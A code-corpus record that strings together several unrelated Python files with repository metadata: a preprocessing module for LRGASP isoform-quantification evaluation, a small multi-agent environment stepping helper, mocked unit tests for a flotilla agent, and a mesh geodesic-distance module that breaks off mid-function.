encode_quantification/preprocess.py
|
LRGASP/lrgasp-challenge-2-evaluation
|
a658b76b9f1356bf3786b75522b28464cdde8a2b
|
[
"MIT"
] | null | null | null |
encode_quantification/preprocess.py
|
LRGASP/lrgasp-challenge-2-evaluation
|
a658b76b9f1356bf3786b75522b28464cdde8a2b
|
[
"MIT"
] | null | null | null |
import base64
import io
import pandas as pd
import numpy as np
import time
import zipfile
import pickle
from app import cache
from library.k_values.main import get_kvalues_dict
from preprocess_util import *
@cache.memoize()
def load_data(contents):
return pd.read_csv(contents[0], sep='\t',header=None,skiprows=1, comment='#')
# content_type, content_string = contents.split(',')
# decoded = base64.b64decode(content_string)
# df = pd.read_csv(io.StringIO(decoded.decode('utf-8')), sep='\t',header=None)
# return df
@cache.memoize()
def load_zipped_data(contents):
if 'zip' in contents[0]:
list_of_df = []
method_names = []
with zipfile.ZipFile(contents[0]) as myzip:
list_of_files = myzip.namelist()
for path in list_of_files:
with myzip.open(path) as myfile:
list_of_df.append(pd.read_csv(myfile, sep='\t',skiprows=1,header=None))
method_names.append(path.split('.')[0])
return list_of_df,method_names
@cache.memoize()
def load_annotation(contents,is_long_read=True,K_value_selection='Condition_number'):
path = 'encode_quantification/library/k_value_dicts/'
if contents[0] == 'human':
with open('{}/lrgasp_gencode_v38_sirvs.pkl'.format(path),'rb') as f:
return pickle.load(f)
elif contents[0] == 'mouse':
with open('{}/lrgasp_gencode_vM27_sirvs.pkl'.format(path),'rb') as f:
return pickle.load(f)
elif contents[0] == 'ensembl_human':
with open('{}/Homo_sapiens.GRCh38.104.chr.pkl'.format(path),'rb') as f:
return pickle.load(f)
else:
with open(contents[0],'r') as f:
return get_kvalues_dict(io.StringIO(f.read()),is_long_read,K_value_selection)
# content_type, content_string = contents.split(',')
# decoded = base64.b64decode(content_string)
# return io.StringIO(decoded.decode('utf-8'))
@cache.memoize()
def preprocess_single_sample(list_of_contents,replicate_column,is_long_read=True,K_value_selection='Condition_number'):
estimated_df = load_data(list_of_contents[0]).set_index(0)[[replicate_column]]
estimated_df.index.name = 'isoform'
estimated_df.columns = ['estimated_abund']
kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict = load_annotation(list_of_contents[1],is_long_read,K_value_selection)
if (list_of_contents[2] is not None):
true_expression_df = load_data(list_of_contents[2]).set_index(0)[[replicate_column]]
true_expression_df.index.name = 'isoform'
true_expression_df.columns = ['true_abund']
df = estimated_df.join(true_expression_df,on='isoform',how='inner').reset_index()
else:
raise Exception('No ground truth data is given')
anno_df = pd.DataFrame({'K_value':pd.Series(kvalues_dict),'num_exons':pd.Series(num_exon_dict),'isoform_length':pd.Series(isoform_length_dict),'gene':pd.Series(isoform_gene_dict)})
anno_df.index.name = 'isoform'
anno_df = anno_df.reset_index()
df = preprocess_single_sample_util(df, kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict)
return df,anno_df
@cache.memoize()
def preprocess_multi_sample_diff_condition(list_of_contents,ground_truth_given,is_long_read=True,K_value_selection='Condition_number'):
estimated_df = load_data(list_of_contents[0]).set_index(0)
kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict = load_annotation(list_of_contents[1],is_long_read,K_value_selection)
if (ground_truth_given):
true_expression_df = load_data(list_of_contents[2]).set_index(0)
intersected_index = true_expression_df.index.intersection(estimated_df.index)
estimated_df = estimated_df.loc[intersected_index,:].reset_index()
true_expression_df = true_expression_df.loc[intersected_index,:].reset_index()
else:
estimated_df = estimated_df.reset_index()
true_expression_df = None
anno_df = pd.DataFrame({'K_value':pd.Series(kvalues_dict),'num_exons':pd.Series(num_exon_dict),'isoform_length':pd.Series(isoform_length_dict),'gene':pd.Series(isoform_gene_dict)})
anno_df.index.name = 'isoform'
anno_df = anno_df.reset_index()
df = preprocess_multi_sample_diff_condition_util(estimated_df,true_expression_df, kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict)
return df,anno_df
@cache.memoize()
def preprocess_single_sample_multi_method(list_of_contents,replicate_column,is_long_read=True,K_value_selection='Condition_number'):
estimated_dfs,method_names = load_zipped_data(list_of_contents[0])
kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict = load_annotation(list_of_contents[1],is_long_read,K_value_selection)
if (list_of_contents[2] is not None):
true_expression_df = load_data(list_of_contents[2]).set_index(0)[[replicate_column]]
true_expression_df.index.name = 'isoform'
true_expression_df.columns = ['true_abund']
else:
raise Exception('No ground truth data is given')
dfs = []
for estimated_df in estimated_dfs:
estimated_df = estimated_df.set_index(0)[[replicate_column]]
estimated_df.index.name = 'isoform'
estimated_df.columns = ['estimated_abund']
df = estimated_df.join(true_expression_df,on='isoform',how='inner').reset_index()
dfs.append(preprocess_single_sample_util(df, kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict))
anno_df = pd.DataFrame({'K_value':pd.Series(kvalues_dict),'num_exons':pd.Series(num_exon_dict),'isoform_length':pd.Series(isoform_length_dict),'gene':pd.Series(isoform_gene_dict)})
anno_df.index.name = 'isoform'
anno_df = anno_df.reset_index()
return dfs,anno_df,method_names
@cache.memoize()
def preprocess_multi_sample_multi_method(list_of_contents,ground_truth_given,is_long_read=True,K_value_selection='Condition_number'):
estimated_dfs,method_names = load_zipped_data(list_of_contents[0])
kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict = load_annotation(list_of_contents[1],is_long_read,K_value_selection)
if (ground_truth_given):
true_expression_df = load_data(list_of_contents[2]).set_index(0)
else:
true_expression_df = None
dfs = []
for estimated_df in estimated_dfs:
estimated_df = estimated_df.set_index(0)
if (ground_truth_given):
intersected_index = true_expression_df.index.intersection(estimated_df.index)
estimated_df = estimated_df.loc[intersected_index,:].reset_index()
temp_true_expression_df = true_expression_df.loc[intersected_index,:].reset_index()
dfs.append(preprocess_multi_sample_diff_condition_util(estimated_df,temp_true_expression_df, kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict))
else:
estimated_df = estimated_df.reset_index()
dfs.append(preprocess_multi_sample_diff_condition_util(estimated_df,None, kvalues_dict,num_exon_dict,isoform_length_dict,isoform_gene_dict))
anno_df = pd.DataFrame({'K_value':pd.Series(kvalues_dict),'num_exons':pd.Series(num_exon_dict),'isoform_length':pd.Series(isoform_length_dict),'gene':pd.Series(isoform_gene_dict)})
anno_df.index.name = 'isoform'
anno_df = anno_df.reset_index()
return dfs,anno_df,method_names
# @cache.memoize()
# def calculate_statistics_multi_sample_same_condition(list_of_contents):
# df = preprocess_files_multi_sample_same_condition(list_of_contents)
# estimated_df = load_data(list_of_contents[0])
# if (list_of_contents[2] is not None):
# true_expression_df = load_data(list_of_contents[2])
# return get_multi_sample_same_conditon_metrics(estimated_df,true_expression_df,df)
# return []
# @cache.memoize()
# def preprocess_files_multi_sample_same_condition(list_of_contents):
# estimated_df = load_data(list_of_contents[0])
# annotation = load_annotation(list_of_contents[1])
# if (list_of_contents[2] is not None):
# true_expression_df = load_data(list_of_contents[2])
# df = preprocess_multi_sample_df_same_condition(estimated_df,true_expression_df,annotation)
# return df
| 54.649007
| 184
| 0.744304
| 1,189
| 8,252
| 4.761144
| 0.120269
| 0.034976
| 0.069246
| 0.041335
| 0.827062
| 0.806395
| 0.764176
| 0.746511
| 0.739622
| 0.717011
| 0
| 0.008503
| 0.144935
| 8,252
| 150
| 185
| 55.013333
| 0.793793
| 0.138027
| 0
| 0.596639
| 0
| 0
| 0.082381
| 0.01989
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.084034
| 0.008403
| 0.226891
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
81e7a4ba47357cbe64d3ab51e78f3af1c28debe0
| 1,378
|
py
|
Python
|
sys_simulator/a2c/parallel.py
|
lbaiao/sys-simulator-2
|
94f00d43309fe7b56dac5099bd4024695ba317b6
|
[
"MIT"
] | 1
|
2020-06-14T13:50:28.000Z
|
2020-06-14T13:50:28.000Z
|
sys_simulator/a2c/parallel.py
|
lbaiao/sys-simulator-2
|
94f00d43309fe7b56dac5099bd4024695ba317b6
|
[
"MIT"
] | null | null | null |
sys_simulator/a2c/parallel.py
|
lbaiao/sys-simulator-2
|
94f00d43309fe7b56dac5099bd4024695ba317b6
|
[
"MIT"
] | null | null | null |
import numpy as np
def step(args):
env = args[0]
agents = args[1]
a, b, c, d = env.step(agents)
c = c * np.ones(len(agents))
return a, b, c, d, env, agents
def unpack_multi_agent(x, n_envs, n_agents):
total = n_envs * n_agents
states, rewards, dones, _, envs, agents = zip(*x)
states = np.array(states).reshape(total, -1)
rewards = np.array(rewards).reshape(total, -1)
dones = np.array(dones).reshape(total, -1)
return states, rewards, dones, envs, agents
def unpack_multi_agent_test(x, n_envs, n_agents):
total = n_envs * n_agents
states, rewards, dones, _, envs, agents = zip(*x)
states = np.array(states).reshape(total, -1)
rewards = np.array(rewards)
dones = np.array(dones).reshape(total, -1)
return states, rewards, dones, envs, agents
def env_step(pool, envs, agents):
n_envs = len(envs)
n_agents = len(agents[0])
aux = pool.map(step, zip(envs, agents))
next_obs, reward, done, envs, agents = \
unpack_multi_agent(aux, n_envs, n_agents)
return next_obs, reward, done, envs, agents
def env_step_test(pool, envs, agents):
n_envs = len(envs)
n_agents = len(agents[0])
aux = pool.map(step, zip(envs, agents))
next_obs, reward, done, envs, agents = \
unpack_multi_agent_test(aux, n_envs, n_agents)
return next_obs, reward, done, envs, agents
| 29.956522
| 54
| 0.650218
| 215
| 1,378
| 4.004651
| 0.181395
| 0.139373
| 0.102207
| 0.083624
| 0.880372
| 0.796748
| 0.796748
| 0.796748
| 0.796748
| 0.796748
| 0
| 0.00831
| 0.214078
| 1,378
| 45
| 55
| 30.622222
| 0.786704
| 0
| 0
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.028571
| 0
| 0.314286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
81f516752dfba634ef794934bbf7813fcc7ca825
| 2,632
|
py
|
Python
|
src/test/cli/test_agent.py
|
pebble/flotilla
|
23d9b3aefd8312879549c50e52ea73f3e3f493be
|
[
"MIT"
] | 5
|
2016-01-01T15:50:21.000Z
|
2018-11-27T17:38:15.000Z
|
src/test/cli/test_agent.py
|
pebble/flotilla
|
23d9b3aefd8312879549c50e52ea73f3e3f493be
|
[
"MIT"
] | 27
|
2015-12-17T07:49:56.000Z
|
2018-07-13T15:06:33.000Z
|
src/test/cli/test_agent.py
|
pebble/flotilla
|
23d9b3aefd8312879549c50e52ea73f3e3f493be
|
[
"MIT"
] | 7
|
2015-12-01T22:04:24.000Z
|
2021-11-28T13:21:35.000Z
|
import unittest
from mock import patch, MagicMock
from flotilla.cli.agent import start_agent
ENVIRONMENT = 'test'
SERVICE = 'test-app'
REGION = 'us-east-1'
ELB = 'elb-1234'
class TestAgent(unittest.TestCase):
@patch('flotilla.cli.agent.get_queue')
@patch('flotilla.cli.agent.get_instance_id')
@patch('flotilla.cli.agent.DynamoDbTables')
@patch('flotilla.cli.agent.Manager')
@patch('flotilla.cli.agent.RepeatingFunc')
@patch('boto.ec2.elb.connect_to_region')
@patch('boto.dynamodb2.connect_to_region')
@patch('boto.kms.connect_to_region')
@patch('boto3.resource')
def test_start_agent_no_elb(self, resource, kms, dynamo, elb, repeat,
manager, tables, get_instance_id, get_queue):
get_queue.return_value = None
get_instance_id.return_value = 'i-123456'
start_agent(ENVIRONMENT, SERVICE, REGION, None, 0.1, 0.1)
dynamo.assert_called_with(REGION)
kms.assert_called_with(REGION)
elb.assert_not_called()
self.assertEquals(2, repeat.call_count)
@patch('flotilla.cli.agent.get_instance_id')
@patch('flotilla.cli.agent.DynamoDbTables')
@patch('flotilla.cli.agent.FlotillaAgentDynamo')
@patch('flotilla.cli.agent.Manager')
@patch('flotilla.cli.agent.RepeatingFunc')
@patch('boto.ec2.elb.connect_to_region')
@patch('boto.dynamodb2.connect_to_region')
@patch('boto.kms.connect_to_region')
@patch('boto3.resource')
def test_start_agent_elb(self, resource, kms, dynamo, elb, repeat, manager,
agent_db, tables, get_instance_id):
get_instance_id.return_value = 'i-123456'
start_agent(ENVIRONMENT, SERVICE, REGION, ELB, 0.1, 0.1)
elb.assert_called_with(REGION)
@patch('flotilla.cli.agent.get_queue')
@patch('flotilla.cli.agent.get_instance_id')
@patch('flotilla.cli.agent.DynamoDbTables')
@patch('flotilla.cli.agent.FlotillaAgentDynamo')
@patch('flotilla.cli.agent.Manager')
@patch('flotilla.cli.agent.RepeatingFunc')
@patch('boto.ec2.elb.connect_to_region')
@patch('boto.dynamodb2.connect_to_region')
@patch('boto.kms.connect_to_region')
@patch('boto3.resource')
def test_start_agent_messaging(self, resource, kms, dynamo, elb, repeat,
manager, agent_db, tables, get_instance_id,
get_queue):
get_instance_id.return_value = 'i-123456'
get_queue.return_value = MagicMock()
start_agent(ENVIRONMENT, SERVICE, REGION, ELB, 0.1, 0.1)
self.assertEquals(3, repeat.call_count)
| 37.070423
| 79
| 0.677052
| 333
| 2,632
| 5.132132
| 0.186186
| 0.109421
| 0.159157
| 0.196606
| 0.773552
| 0.773552
| 0.773552
| 0.734933
| 0.709772
| 0.709772
| 0
| 0.021657
| 0.193009
| 2,632
| 70
| 80
| 37.6
| 0.782957
| 0
| 0
| 0.578947
| 0
| 0
| 0.329027
| 0.292933
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.052632
| false
| 0
| 0.052632
| 0
| 0.122807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c34fa9d1872e5eb2eab91e38808c0ca72bc226d4
| 36,228
|
py
|
Python
|
src/seam/boundary/distance_calculation.py
|
MahiroGoto/seam
|
bd690dcef3305b9200aae287db085a38693bcafd
|
[
"MIT"
] | null | null | null |
src/seam/boundary/distance_calculation.py
|
MahiroGoto/seam
|
bd690dcef3305b9200aae287db085a38693bcafd
|
[
"MIT"
] | null | null | null |
src/seam/boundary/distance_calculation.py
|
MahiroGoto/seam
|
bd690dcef3305b9200aae287db085a38693bcafd
|
[
"MIT"
] | null | null | null |
import math
from typing import Dict, Union
import math
import numpy as np
from compas.geometry import Vector, Point, Rotation, Plane
from compas.datastructures import Mesh
from seam.utils import utils, primitive, parameters
from seam.Branch import discrete_curve, boundary_control
import igl
import logging
## logging settings ##
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
file_handler = logging.StreamHandler()
formatter = logging.Formatter('%(levelname)s : %(message)s')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
########################
######################################
## calculating distance differences ##
class Differences:
def __init__(self, MESH, seam_vertex_keys_list):
self.mesh = MESH
self.svkl = seam_vertex_keys_list
self.seam_num = len(self.svkl)
# self.width_01 = width_01
## settings ##
self.distances_list = self.get_distances_list_from_every_boundary()
self.short_way, self.long_way, self.ave_way, self.way_list = self.get_short_long_ave_way_length_on_every_vertex()
self.gap_ratio = self.get_gap_ratio()
# ## results ##
# self.realm_dict = self.get_seam_realm_dict_from_vertex_geodesic()
#######################################################
## functions ##
def compute_geodesic_to_every_vertex(self, mesh, vertices_start):
v, f = mesh.to_vertices_and_faces()
v = np.array(v)
f = np.array(f)
vertices_target = np.arange(len(v)) # all vertices are targets
vstart = np.array(vertices_start)
distances = igl.exact_geodesic(v, f, vstart, vertices_target)
return distances
def compute_geodesic_from_start_to_target_vkeys(self, mesh, start_v_keys_list, target_v_keys_list):
v, f = mesh.to_vertices_and_faces()
v = np.array(v)
f = np.array(f)
vertices_start = np.array(start_v_keys_list)
vertices_target = np.array(target_v_keys_list)
distances = igl.exact_geodesic(v, f, vertices_start, vertices_target)
return distances
## get values ##
def get_distances_list_from_every_boundary(self):
distances_list = []
for seam_vkeys in self.svkl:
distances = list(compute_geodesic_to_every_vertex(self.mesh, seam_vkeys))
distances_list.append(distances)
return distances_list
## calculating ##
def get_short_long_ave_way_length_on_every_vertex(self):
# distances_list = get_distances_list_from_every_seams(mesh, seam_vertex_keys_list)
vkeys = self.mesh.vertices()
way_list = []
for vkey in vkeys:
vdis_list = [distances[vkey] for distances in self.distances_list]
vdis_list.sort()
d00 = vdis_list[0]
d01 = vdis_list[1]
way = d00 + d01
way_list.append(way)
temp_list = [way for way in way_list]
temp_list.sort()
short_way = temp_list[0]
long_way = temp_list[-1]
ave_way = sum(temp_list) / len(temp_list)
return short_way, long_way, ave_way, way_list
def get_gap_ratio(self):
gap_ratio = (self.long_way - self.short_way) / self.long_way
return gap_ratio
# #######################################################
# def get_seam_realm_dict_from_vertex_geodesic(self):
# realm_dict = {}
# for i in range(3):
# realm_dict["piece_0" + str(i)] = []
# vkeys = self.mesh.vertices()
# for vkey in vkeys:
# dist_list = [distances[vkey] for distances in self.distances_list]
# closest = min(dist_list)
# seam_number = dist_list.index(closest)
# realm_dict["piece_0" + str(seam_number)].append(vkey)
# return realm_dict
#
# def equal_differences(self, time):
# # if len(self.distances_list) <= 2:
# difs = [(d01 * time - d00 * (1 - time)) for d00, d01 in zip(self.distances_list[0], self.distances_list[1])]
# return difs
## for connection detail ##
def calculate_custom_differences_with_two_boundaries(self, base_boundary_num, time,
minValue=0.5,
frequency=2.5):
difs = []
distances_00 = self.distances_list[0]
distances_01 = self.distances_list[1]
for D_00, D_01, way in zip(distances_00, distances_01, self.way_list):
x = abs(self.long_way - way) / (self.long_way - self.short_way)
width = self.long_way * minValue
freq = frequency
alpha = freq * math.pi * x
a = minValue
y = ((1 - a) / 2) * math.cos(alpha) + ((a + 1) / 2)
if y > 1:
y = 1
elif y < a:
y = a
if base_boundary_num == 0:
dif = (D_01) * time - (D_00 * y) * (1 - time)
else:
dif = (D_00) * time - (D_01 * y) * (1 - time)
# value = width * math.cos(alpha) + width / 2
# if value > width:
# value = width
# elif value < 0:
# value = 0
# addv = value * (0.5 - abs(0.5 - time))
# ## get the difference value ##
# if base_boundary_num == 0:
# dif = ((D_01 + addv) * time - (D_00) * (1 - time))
# else:
# dif = ((D_00 + addv) * time - (D_01) * (1 - time))
difs.append(dif)
return difs
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# x = abs(self.long_way - way)
# y = abs(self.ave_way - way)
# check_value = abs(self.long_way - self.ave_way)
# value = width * math.cos((2.7 * math.pi / (self.long_way - self.short_way)) * x) + width / 2
# # value = value * (1 - 1 / (y + 1))
# if value >= width:
# value = width
# elif value < 0: value = 0
# else:
# value = value
# addv = value * (0.5 - abs(0.5 - time))
# dif00 = ((d01 + addv) * time - d00 * (1 - time))
# difs00.append(dif00)
# return difs00
# def custom_differences_01_second(self, time, width=70):
# """
# diftype == 1.2
# """
# # width = self.width_01
# difs01 = []
# time_ = time
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# x = abs(self.long_way - way)
# y = abs(self.ave_way - way)
# check_value = abs(self.long_way - self.ave_way)
# value = 10 * width * math.cos((2 * math.pi / (self.long_way - self.short_way)) * x) - 1.5 * width
# # value = value * (1 - 1/(y+1))
# if value <= 0:
# value = 0
# elif value > width:
# value = width
# else:
# value = value
# addv = value * (0.5 - abs(0.5 - time))
# dif01 = (d01 - addv) * time - (d00) * (1 - time)
# difs01.append(dif01)
# return difs01
#
# ## for connection detail 2.0 ##
# def custom_differences_03_first(self, time, width=210, flat_ratio=0.2):
# """
# diftype == 3.1
# """
# difs00 = []
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# check_value = abs(self.ave_way - way)
# l_value = abs(self.long_way - way)
# s_value = abs(self.short_way - way)
# wid = width
# if self.ave_way - way >= 0:
# ## define the short side ##
# value = wid * ((1/(s_value+1))**0.4) - wid * ((1/abs(self.short_way-self.ave_way))**0.4) * (1 + flat_ratio)
# else:
# ## define the long side ##
# value = wid * ((1/(l_value+1))**0.2) - wid * ((1/abs(self.long_way-self.ave_way))**0.2) * (1 + flat_ratio)
# if value < 0: value = 0
# addv = value * (0.5 - abs(0.5-time))
#
# dif = (d01 + addv/2)*time - (d00)*(1-time)
# difs00.append(dif)
# return difs00
#
# def custom_differences_03_second(self, time, width=210, flat_ratio=0.2):
# """
# diftype == 3.2
# """
# difs01 = []
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# check_value = abs(self.ave_way - way)
# l_value = abs(self.long_way - way)
# s_value = abs(self.short_way - way)
# wid = width
# if self.ave_way - way >= 0:
# ## define the short side ##
# value = wid * ((1/(s_value+1))**0.3) - wid * ((1/abs(self.short_way -self.ave_way))**0.3) * (1 + flat_ratio)
# else:
# ## define the long side ##
# value = wid * ((1/(l_value+1))**0.15) - wid * ((1/abs(self.long_way - self.ave_way))**0.15) * (1 + flat_ratio)
# if value < 0: value = 0
# addv = value * (0.5 - abs(0.5-time))
#
# dif = (d01 - addv/2)*time - (d00)*(1-time)
# difs01.append(dif)
# return difs01
#
# ## for distance gap ##
# def custom_differences_02_first(self, time):
# """
# diftype == 2.1
# """
# width = (self.short_way * self.gap_ratio)
# ## get the differences from start seam and from last seam ##
# difs00 = []
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# x = abs(self.ave_way - way)
# check_value = abs(self.ave_way - self.long_way)
# wid = width
# if (self.ave_way - way) >= 0:
# ## make the value smoother ##
# value = wid * ((x / check_value) ** 1.5) * (1 - 1 / (x + 1))
# else:
# value = 0
# addv = value * (0.5 - abs(0.5 - time))
# dif00 = ((d01 - addv) * time - d00 * (1 - time))
# difs00.append(dif00)
# return difs00
#
# def custom_differences_02_second(self, time):
# """
# diftype == 2.2
# """
# width = (self.short_way * self.gap_ratio)
# difs01 = []
# time_ = time
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# x = abs(self.ave_way - way)
# check_value = abs(self.ave_way - self.long_way)
# wid = width
# if (self.ave_way - way) >= 0:
# ## make the value smoother ##
# value = wid * ((x / check_value) ** 1.5) * (1 - 1 / (x + 1))
# else:
# value = 0
# addv = value * (0.5 - abs(0.5 - time_))
# dif01 = ((d01 + addv) * time_ - d00 * (1 - time_))
# difs01.append(dif01)
# return difs01
######################################
## calculating distance attribution ##
class Distance_Attributes_two:
def __init__(self, MESH, boundary_vertex_keys_list):
self.mesh = MESH
self.bvkl = boundary_vertex_keys_list
self.boundary_num = len(self.bvkl)
## settings ##
self.distances_list = self.get_distances_list_from_every_boundary()
self.short_way, self.long_way, self.ave_way, self.way_list \
= self.get_short_long_ave_way_length_on_every_vertex()
self.gap_ratio = self.get_gap_ratio()
def get_distances_list_from_every_boundary(self):
distances_list = []
for boundary_vkeys in self.bvkl:
distances = list(compute_geodesic_to_every_vertex(self.mesh, boundary_vkeys))
distances_list.append(distances)
return distances_list
## calculating ##
def get_short_long_ave_way_length_on_every_vertex(self):
# distances_list = get_distances_list_from_every_seams(mesh, seam_vertex_keys_list)
vkeys = self.mesh.vertices()
way_list = []
for vkey in vkeys:
vdis_list = [distances[vkey] for distances in self.distances_list]
vdis_list.sort()
d00 = vdis_list[0]
d01 = vdis_list[1]
way = d00 + d01
way_list.append(way)
temp_list = [way for way in way_list]
temp_list.sort()
short_way = temp_list[0]
long_way = temp_list[-1]
ave_way = sum(temp_list) / len(temp_list)
return short_way, long_way, ave_way, way_list
def get_gap_ratio(self):
gap_ratio = (self.long_way - self.short_way) / self.long_way
return gap_ratio
def get_attributes_from_one_base_boundary(self, base_boundary_num, time,
minValue=0.5, frequency=1.0, longWayExtention=False):
attrs = []
difs = []
distances_00 = self.distances_list[0]
distances_01 = self.distances_list[1]
for D_00, D_01, way in zip(distances_00, distances_01, self.way_list):
x = (way / self.long_way)
compare = self.short_way / self.long_way
freq = frequency ## from 1 to 3 ##
alpha = freq * math.pi * (x - compare) / (1 - compare)
a = minValue
## fomura for the distortion ##
if not longWayExtention:
## short way extention ##
y = (((1 - a) / 2) + ((a + 1) / 4)) * math.sin(alpha) + ((a + 1) / 2) + ((a + 1) / 4)
if y > 1: y = 1
else:
## long way extention ##
y = (((1 - a) / 2) + ((a + 1) / 4)) * math.cos(alpha) + ((a + 1) / 2) + ((a + 1) / 4)
if y > 1: y = 1
## distribute the boundary area depending on the distance calculation with distortion fomura ##
if base_boundary_num == 0:
d_00 = D_00 * (1-time) * y
d_01 = D_01 * (time)
## set base distance ##
base_distance = d_00
target_distance = d_01
elif base_boundary_num == 1:
d_00 = D_00 * (time)
d_01 = D_01 * (1 - time) * y
## set base distance ##
base_distance = d_01
target_distance = d_00
else:
print("error with setting the base_boundary_num")
break
## select the short value ##
short_distance = min([d_00, d_01])
if short_distance == d_00:
attr = 0
else:
attr = 1
attrs.append(attr)
## calculate differences ##
dif = base_distance - target_distance
difs.append(dif)
return attrs, difs
class Distance_Attributes_three:
def __init__(self, MESH, boundary_vertex_keys_list):
self.mesh = MESH
self.bvkl = boundary_vertex_keys_list
self.boundary_num = len(self.bvkl)
## settings ##
self.distances_list = self.get_distances_list_from_every_boundary()
self.short_way, self.long_way, self.ave_way, self.way_list \
= self.get_short_long_ave_way_length_on_every_vertex()
self.gap_ratio = self.get_gap_ratio()
def get_distances_list_from_every_boundary(self):
distances_list = []
for boundary_vkeys in self.bvkl:
distances = list(compute_geodesic_to_every_vertex(self.mesh, boundary_vkeys))
distances_list.append(distances)
return distances_list
## calculating ##
def get_short_long_ave_way_length_on_every_vertex(self):
# distances_list = get_distances_list_from_every_seams(mesh, seam_vertex_keys_list)
vkeys = self.mesh.vertices()
way_list = []
for vkey in vkeys:
vdis_list = [distances[vkey] for distances in self.distances_list]
vdis_list.sort()
d00 = vdis_list[0]
d01 = vdis_list[1]
way = d00 + d01
way_list.append(way)
temp_list = [way for way in way_list]
temp_list.sort()
short_way = temp_list[0]
long_way = temp_list[-1]
ave_way = sum(temp_list) / len(temp_list)
return short_way, long_way, ave_way, way_list
def get_gap_ratio(self):
gap_ratio = (self.long_way - self.short_way) / self.long_way
return gap_ratio
def get_attributes_from_one_base_boundary(self, base_boundary_num, time,
minValue=0.75, frequency=2.0, longWayExtention=False):
attrs = []
difs = []
distances_00 = self.distances_list[0]
distances_01 = self.distances_list[1]
distances_02 = self.distances_list[2]
for D_00, D_01, D_02, way in zip(distances_00, distances_01, distances_02, self.way_list):
# x = way / self.long_way
# compare = self.short_way / self.long_way
x = (self.long_way - way) / (self.long_way - self.short_way)
## x is changing from 0 with long_way to 1 with short_way ##
freq = frequency
alpha = freq * math.pi * x
a = minValue
## fomura for the distortion ##
if longWayExtention:
## short way extention ##
y = ((1 - a) / 2) * math.sin(alpha) + ((a + 1) / 2)
if y > 1:
y = 1
elif y < a:
y = a
else:
## long way extention ##
y = ((1 - a) / 2) * math.cos(alpha) + ((a + 1) / 2)
if y > 1:
y = 1
elif y < a:
y = a
## distribute the boundary area depending on the distance calculation with distortion fomura ##
if base_boundary_num == 0:
d_00 = D_00 * (1-time) * y
d_01 = D_01 * (time)
d_02 = D_02 * (time)
## set base distance ##
base_dist = d_00
target_dists = [d_01, d_02]
elif base_boundary_num == 1:
d_00 = D_00 * (time)
d_01 = D_01 * (1-time) * y
d_02 = D_02 * (time)
## set base distance ##
base_dist = d_01
target_dists = [d_00, d_02]
elif base_boundary_num == 2:
d_00 = D_00 * (time)
d_01 = D_01 * (time)
d_02 = D_02 * (1-time) * y
## set base distance ##
base_dist = d_02
target_dists = [d_00, d_01]
else:
print("error with setting the base_boundary_num")
break
## select short value ##
short_distance = min([d_00, d_01, d_02])
if short_distance == d_00:
attr = 0
elif short_distance == d_01:
attr = 1
else:
attr = 2
attrs.append(attr)
## calculate differences ##
dif = base_dist - min(target_dists)
difs.append(dif)
return attrs, difs
class Distance_Attributes_four:
def __init__(self, MESH, boundary_vertex_keys_list):
self.mesh = MESH
self.bvkl = boundary_vertex_keys_list
self.boundary_num = len(self.bvkl)
## settings ##
self.distances_list = self.get_distances_list_from_every_boundary()
self.short_way, self.long_way, self.ave_way, self.way_list \
= self.get_short_long_ave_way_length_on_every_vertex()
self.gap_ratio = self.get_gap_ratio()
def get_distances_list_from_every_boundary(self):
distances_list = []
for boundary_vkeys in self.bvkl:
distances = list(compute_geodesic_to_every_vertex(self.mesh, boundary_vkeys))
distances_list.append(distances)
return distances_list
## calculating ##
def get_short_long_ave_way_length_on_every_vertex(self):
vkeys = self.mesh.vertices()
way_list = []
for vkey in vkeys:
vdis_list = [distances[vkey] for distances in self.distances_list]
vdis_list.sort()
d00 = vdis_list[0]
d01 = vdis_list[1]
way = d00 + d01
way_list.append(way)
temp_list = [way for way in way_list]
temp_list.sort()
short_way = temp_list[0]
long_way = temp_list[-1]
ave_way = sum(temp_list) / len(temp_list)
return short_way, long_way, ave_way, way_list
def get_gap_ratio(self):
gap_ratio = (self.long_way - self.short_way) / self.long_way
return gap_ratio
def get_attributs_from_one_base_boundary(self, base_boundary_num, time,
minValue=0.75, frequency=2.0, longWayExtention=False):
attrs = []
difs = []
